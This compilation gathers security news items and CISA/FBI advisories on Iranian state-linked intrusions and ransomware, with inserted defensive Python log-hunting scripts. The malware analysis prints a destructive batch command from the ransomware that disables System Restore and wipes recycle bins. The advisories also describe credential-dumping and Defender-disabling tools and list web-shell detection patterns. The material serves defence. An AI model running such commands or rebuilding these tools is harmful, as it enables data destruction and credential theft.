Protesters against the Iran regime are getting a boost to aid their efforts from hacking groups who are using Telegram, Signal and the dark web to get around government restrictions.
“Key activities are data leaking and selling, including officials’ phone numbers and emails, and maps of sensitive locations. CPR sees the sharing of open VPN servers to bypass censorship and reports on the internet status in Iran, as well as the hacking of conversations and guides,” according to a blog post by Check Point Research (CPR), which shared five examples of the counterprotesters’ activities.
Telegram groups, the researchers said, have between 900 and 1,200 members each; some offer lists of proxies and VPNs for getting around Iranian government censorship, while another group helps protesters gain access to social media.
CPR noted the activities the day after protests began following the death of Mahsa Amini. “Specifically, hacker groups are allowing people in Iran to communicate with each other, share news and what is going on in different places, which is what the government is trying to avoid, to lower the flames,” CPR said. “As per usual with these uprisings, there are some hacking groups that are trying to make a profit from the situation and to sell information from Iran and the regime.”
Researchers specifically called out the Official Atlas Intelligence Group channel, a group with 900 members that uses Telegram to leak and sell data. They are “focusing on leaking data that can help against the regime in Iran, including officials’ phone numbers and emails and maps of sensitive locations,” CPR said, as well as “upsell” private information on the Iranian Revolutionary Guard Corp (RGC). They are also offering a list of proxies to help protesters bypass censorship in Iran.
The 5,000-strong Arvin group is also using the messaging platform to leak and sell data. Its focus is “on news from the protests in Iran, reports and videos from the streets where the protests are in Iran,” CPR said. They also provide Open VPN services and report on internet status in the country.
Red Blue is another group with 4,000 members and is also using Telegram to hack…
Source: SecureTech, 2022-09-30, “Hackers Use Telegram, Signal, Dark Web to Help Iranian Protesters”
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.
In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. An FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.
Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.
In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.
In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.
Download the PDF version of this report: pdf, 1221 kb
Initial access
Timeframe: Approximately 14 months before encryption and wiper attacks.
Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.
Persistence and Lateral movement
Timeframe: Approximately several days to two months after initial compromise.
Details: After obtaining access to the victim environment, the actors used several .aspx webshells (pickers.aspx, error4.aspx, and ClientBin.aspx) to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.
Exchange Server compromise
Timeframe: Approximately 1-6 months after initial compromise.
Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.
Likely Email exfiltration
Timeframe: Approximately 8 months after initial compromise.
Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.
VPN activity
Timeframe: Approximately 12-14 months after initial compromise.
Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance. The actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner” (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.
File Cryptor (ransomware-style file encryptor)
Timeframe: Approximately 14 months after initial compromise.
Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.
Wiper attack
Timeframe: Approximately 14 months after initial compromise.
Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Over approximately the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.
Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
Monitor for unusually large amounts of data (e.g., several GB) being transferred from a Microsoft Exchange server.
Check the host-based indications, including webshells, for positive hits within your environment.
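The Exchange transfer-volume check above can be turned into a simple log review. The following is an added example, not code from the advisory: it reads W3C-style IIS log lines from an Exchange front end, sums bytes the server sent to each client per day, and flags clients that exceed a volume or POST-count threshold. The sample log lines, the 1 GB threshold, and the field layout are constructed assumptions to tune against your own baseline.

```python
"""Flag clients pulling unusually large volumes from an Exchange server.

Added example, not from the advisory. Parses W3C-style IIS log lines
(fields: date time cs-method cs-uri-stem c-ip sc-bytes cs-bytes) and
sums bytes per client per day. The thresholds and sample lines are
constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample lines (not a real capture). sc-bytes = server->client.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-bytes cs-bytes
2022-07-15 02:01:10 POST /ews/exchange.asmx 198.51.100.23 367001600 1048576
2022-07-15 02:05:44 POST /ews/exchange.asmx 198.51.100.23 419430400 2097152
2022-07-15 02:09:02 POST /ews/exchange.asmx 198.51.100.23 314572800 1572864
2022-07-15 02:13:37 POST /ews/exchange.asmx 198.51.100.23 262144000 1310720
2022-07-15 08:30:00 GET /owa/ 192.0.2.10 204800 4096
2022-07-15 08:31:12 POST /owa/service.svc 192.0.2.10 512000 8192
"""

GB = 1024 ** 3
# The advisory describes server-side transfers of roughly 3-20 GB; 1 GB per
# client per day is a constructed starting threshold, not an advisory value.
BYTES_THRESHOLD = 1 * GB
POST_THRESHOLD = 1000  # "thousands of HTTP POST requests" per the advisory


@dataclass
class ClientStats:
    posts: int = 0
    bytes_from_server: int = 0
    bytes_to_server: int = 0


def parse_lines(text):
    """Yield (date, method, uri, client_ip, sc_bytes, cs_bytes), skipping directives."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue  # malformed line; ignore rather than abort the review
        date, _time, method, uri, ip, sc, cs = parts[:7]
        yield date, method, uri, ip, int(sc), int(cs)


def aggregate(text):
    """Return {(date, client_ip): ClientStats} over all parsed lines."""
    stats = defaultdict(ClientStats)
    for date, method, _uri, ip, sc, cs in parse_lines(text):
        s = stats[(date, ip)]
        if method == "POST":
            s.posts += 1
        s.bytes_from_server += sc
        s.bytes_to_server += cs
    return stats


def find_suspects(text, bytes_threshold=BYTES_THRESHOLD, post_threshold=POST_THRESHOLD):
    """Return sorted (date, ip, gb_from_server, posts) for clients over either threshold."""
    out = []
    for (date, ip), s in aggregate(text).items():
        if s.bytes_from_server >= bytes_threshold or s.posts >= post_threshold:
            out.append((date, ip, round(s.bytes_from_server / GB, 2), s.posts))
    return sorted(out)


if __name__ == "__main__":
    for date, ip, gb, posts in find_suspects(SAMPLE_LOG):
        print(f"{date} {ip}: {gb} GB sent by server across {posts} POST requests")
```

Aggregating per day hides slow, multi-day exfiltration; for the year-long access described in this advisory, run the same aggregation over a rolling week as well.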
Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:
Maintain and test an incident response plan.
Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
Properly configure and secure internet-facing network devices.
Do not expose management interfaces to the internet.
Disable unused or unnecessary network ports and protocols.
Disable/remove unused network services and devices.
Additional details concerning some of these files are provided in Appendix B.
| File | MD5 Hash | Notes |
| --- | --- | --- |
| Error4.aspx | 81e123351eb80e605ad73268a5653ff3 | Webshell |
| cl.exe | 7b71764236f244ae971742ee1bc6b098 | Wiper |
| GoXML.exe | bbe983dba3bf319621b447618548b740 | Encryptor |
| Goxml.jpg | 0738242a521bdfe1f3ecc173f1726aa1 | |
| ClientBin.aspx | a9fa6cfdba41c57d8094545e9b56db36 | Webshell (reverse-proxy connections) |
| Pickers.aspx | 8f766dea3afd410ebcd5df5994a3c571 | Webshell |
| evaluatesiteupgrade.cs.aspx | Unknown | Webshell |
| mellona.exe | 78562ba0069d4235f28efd01e3f32a82 | Propagation for Encryptor |
| win.bat | 1635e1acd72809479e21b0ac5497a79b | Launches GoXml.exe on startup |
| win.bat | 18e01dee14167c1cf8a58b6a648ee049 | Changes desktop background to encryption image |
| bb.bat | 59a85e8ec23ef5b5c215cd5c8e5bc2ab | Saves SAM and SYSTEM hives to C:\Temp, makes cab archive |
| disable_defender.exe | 60afb1e62ac61424a542b8c7b4d2cf01 | Disables Windows Defender |
| rwdsk.sys | 8f6e7653807ebb57ecc549cef991d505 | Raw disk driver utilized by wiper malware |
| App_Web_bckwssht.dll | e9b6ecbf0783fa9d6981bba76d949c94 | |
Network-based IOCs
FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):
| Country | Company |
| --- | --- |
| AL | KEMINET LTD. |
| DE | NOOP-84-247-59-0-25 |
| DE | GSL NETWORKS |
| GB | LON-CLIENTS |
| GB | GB-DATACENTER |
| NL | NL-LAYERSWITCH-20190220 |
| NL | PANQ-45-86-200-0 |
| US | PRIVATE CUSTOMER |
| US | BANDITO NETWORKS |
| US | EXTERNAL |
| US | RU-SELENA-20080725 |
| US | TRANS OCEAN NETWORK |
Appendix B
Ransomware Cryptor
GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).
If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog window is presented, and any opened documents receive an error prompt labeled Xml Form Builder.
All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.
The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.
@for /F "skip=1" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\root\default Path SystemRestore Call disable "%C\" & @rd /s /q %C\$Recycle.bin)
@for %C in (%PrcLst%) do @taskkill /f /im "%C.exe"
@set PrcLst=
@exit
The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.
The ransomware’s file encryption routine generates a random string, takes its MD5 hash, and uses that to derive a 128-bit RC4 key which is used to encrypt files. This key is encrypted with a hard-coded public RSA key and converted to Base64 using a custom alphabet. The result is appended to the end of the ransom note.
The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.
Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.
Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.
The files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:
in
un
wp <optional argument>
If executed with the in command, the utility outputs “in start!” and installs a hard-coded file named rwdsk.sys as a service named RawDisk3. The .SYS file is not extracted from the installer; rather, the installer looks for the file in the same directory from which cl.exe is executed.
It will also load the driver after installation.
The un command uninstalls the service, outputting the message “un start!” to the terminal. The wp command accesses the loaded driver for raw disk access.
The long hexadecimal string is hard coded in the cl.exe binary.
The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string. It is uncertain what creates this path to a device as the driver tested did not.
The output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.
If the registry key value HKLM\SOFTWARE\EldoS\EventLog is set to “Enabled”, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\..\DriverLibraries\DrvSupLib\install.c. If the system does not have the SOFTWARE\EldoS key, no event logs are produced. This feature must be related to the legitimate EldoS utility.
rwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.”
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA
Cert #1 SHA1: 30632ea310114105969d0bda28fdce267104754f
Cert #2 Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5
C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA
Cert #3 Issuer: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5
Cert #3 SHA1: 495847a93187cfb8c71f840cb7b41497ad95c64f
Additional Files
Web Deployed Reverse Proxy
Description
ClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.
Sending a POST request with a Base64-encoded IP and port opens a second socket to the supplied IP and port, making this a web proxy.
Sending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.
The DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLL’s decoded strings. It is uncertain why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing “EncryptionDLL” binaries.
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
PEtype: DLL
PE Header Timestamp: 2021-06-07 10:37:55
ImpHash: dae02f32a21e03ce65412f6e56942daa
Disable Defender
Description
disable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status and error messages is displayed as the application executes. No network activity was detected during the evaluation.
Upon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.
The application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:
The following Registry Keys were modified to disable Windows Defender:
Source: SecureTech, 2022-09-22, “Iranian State Actors Conduct Cyber Operations Against the Government of Albania”
The U.S. Department of Justice unsealed an indictment Sept. 14 charging three Iranian nationals with allegedly running a massive, global ransomware operation that hacked into the computer networks of multiple U.S. victims, including several in the Garden State.
The indictment charges Mansour Ahmadi, Ahmad Khatibi Aghda and Amir Hossein Nickaein Ravari of engaging in the scheme. The three, who are residents of Iran, are each charged with one count of conspiring to commit computer fraud and related activity, one count of intentionally damaging a protected computer, and one count of transmitting a demand in relation to damaging a protected computer.
“The Government of Iran has created a safe haven where cyber criminals acting for personal gain flourish and defendants like these are able to hack and extort victims, including critical infrastructure providers,” said Assistant Attorney General Matthew Olsen of the Justice Department’s National Security Division. “This indictment makes clear that even other Iranians are less safe because their own government fails to follow international norms and stop Iranian cyber criminals.”
Staying safe
The hacking allegedly exploited vulnerabilities in software and networks to gain access and exfiltrate data and information from victims’ computer systems. The indictment also accuses the trio of denying victims access to their systems and data unless a ransom payment was made.
The three men are accused of victimizing a broad range of organizations, including small businesses, government agencies, nonprofit programs and institutions, as well as critical infrastructure sectors such as health care centers, transportation services and utility providers.
Here in New Jersey, according to court documents, the defendants targeted a township in Union County in February 2021, gaining control and access to the township’s network and data and using a hacking tool to establish persistent remote access to a particular domain that was registered to one of the men.
They are also accused of targeting a Morris County-based accounting firm in or before February 2022, using a hacking tool to establish a connection to a server registered to one of…
Source: SecureTech, 2022-09-15, “Three Iranian nationals charged with hacking New Jersey targets”
This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”
Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.
The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific entities or sectors.
This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.
Download the PDF version of this report: pdf, 836 kb
Technical Details
Threat Actor Activity
As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.
Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.
The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.
IRGC-affiliated actor activity observed by the authoring agencies includes:
In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.
MITRE ATT&CK® Tactics and Techniques
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.
The authoring agencies assess the following tactics and techniques are associated with this activity.
The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:
Fast Reverse Proxy (FRP) for command and control (C2)
Plink for C2
Remote Desktop Protocol (RDP) for lateral movement
BitLocker for data encryption
SoftPerfect Network Scanner for system network configuration discovery
The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:
Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
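Both the web shell naming convention above and the web shell file names from the Albania advisory earlier on this page (pickers.aspx, error4.aspx, ClientBin.aspx, evaluatesiteupgrade.cs.aspx, with ClientBin.aspx answering to a WV-RESET parameter) can be hunted for in web server logs. The following is an added example, not code from either advisory: it reads W3C-style IIS log lines and reports requests whose target matches a known name, the aspx_<11 letters>.aspx pattern, or a known shell name combined with WV-RESET. The sample log lines and the field layout are constructed; login.aspx and default.aspx are reported only as low confidence because the directory list that qualifies them was not captured on this page.

```python
"""Hunt web server logs for requests to web-shell-like paths.

Added example, not part of either advisory. Parses W3C-style IIS log lines
(fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status).
Sample lines are constructed; paths in them are placeholders.
"""
import re

# File names given in the Albania advisory's IOC table (compared case-insensitively).
KNOWN_SHELL_NAMES = {"pickers.aspx", "error4.aspx", "clientbin.aspx", "evaluatesiteupgrade.cs.aspx"}
# aspx_ followed by exactly 11 alphabetic characters, per the IRGC advisory.
RANDOM_NAME_RE = re.compile(r"^aspx_[a-z]{11}\.aspx$", re.IGNORECASE)
# Only suspicious in specific directories the advisory lists (not captured here),
# so these are reported as leads rather than hits.
GENERIC_NAMES = {"login.aspx", "default.aspx"}

SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-03-02 11:02:13 GET /owa/auth/logon.aspx - 192.0.2.10 200
2022-03-02 11:04:51 POST /owa/auth/aspx_kqzmrtlbvxe.aspx - 198.51.100.7 200
2022-03-02 11:05:20 POST /aspnet_client/ClientBin.aspx - 198.51.100.7 200
2022-03-02 11:05:25 POST /aspnet_client/ClientBin.aspx WV-RESET=1 198.51.100.7 200
2022-03-02 11:09:00 GET /ecp/default.aspx - 192.0.2.10 302
"""


def parse(text):
    """Yield one dict per data line; directive lines and short lines are skipped."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, method, stem, query, ip, status = parts[:7]
        yield {"date": date, "time": time, "method": method, "stem": stem,
               "query": query, "ip": ip, "status": status}


def classify_request(stem, query):
    """Return (confidence, reason) for a suspicious request, or None."""
    name = stem.rsplit("/", 1)[-1].lower()
    if name in KNOWN_SHELL_NAMES:
        if "wv-reset" in query.lower():
            return ("high", f"{name} called with WV-RESET (reverse proxy shutdown command)")
        return ("high", f"known web shell file name {name}")
    if RANDOM_NAME_RE.match(name):
        return ("high", "aspx_<11 letters>.aspx naming convention")
    if name in GENERIC_NAMES:
        return ("low", f"{name}: verify it sits in an expected directory")
    return None


def find_hits(text):
    """Return [(time, client_ip, uri_stem, confidence, reason)] for flagged requests."""
    hits = []
    for rec in parse(text):
        verdict = classify_request(rec["stem"], rec["query"])
        if verdict:
            hits.append((rec["time"], rec["ip"], rec["stem"], verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

A name match should send you to the file itself: hash it against the IOC table, check its creation time against the patch history of the server, and look at the client IPs that touched it before the first flagged request.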
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:
The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.
Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
Note: Refer to Appendix A for IOCs.
Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105.
Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470, because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
Review antivirus logs for indications they were unexpectedly turned off.
Look for WinRAR and FileZilla in unexpected locations.
Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.
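The last two review items (WinRAR and FileZilla in unexpected locations, and executables masquerading as Windows processes with cmd.exe or powershell.exe as parent) are one check over process-creation telemetry. The following is an added example, not code from the advisory: it takes records of image path and parent image path, as Sysmon event 1 or EDR telemetry would provide, and flags a known name running outside its expected directory, raising the severity when the parent is a command shell. The sample records are constructed, and the expected-directory table is an assumption based on default install locations that you should adjust for your environment.

```python
"""Review process-creation records for masquerading or relocated executables.

Added example, not part of the advisory. Records are dicts with "image" and
"parent" Windows paths; the sample records are constructed. EXPECTED_DIRS
holds default locations and is an assumption to adjust per environment.
"""
import ntpath

# Executable name -> directories it legitimately runs from (lowercase, no trailing slash).
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    # Default install paths for the tools the advisory names (assumption).
    "winrar.exe": {r"c:\program files\winrar", r"c:\program files (x86)\winrar"},
    "filezilla.exe": {r"c:\program files\filezilla ftp client"},
}
# Parents the advisory calls out for malicious files masquerading as Windows processes.
SHELL_PARENTS = {"cmd.exe", "powershell.exe"}

# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Users\Public\svchost.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Temp\lsass.exe", "parent": r"C:\Windows\explorer.exe"},
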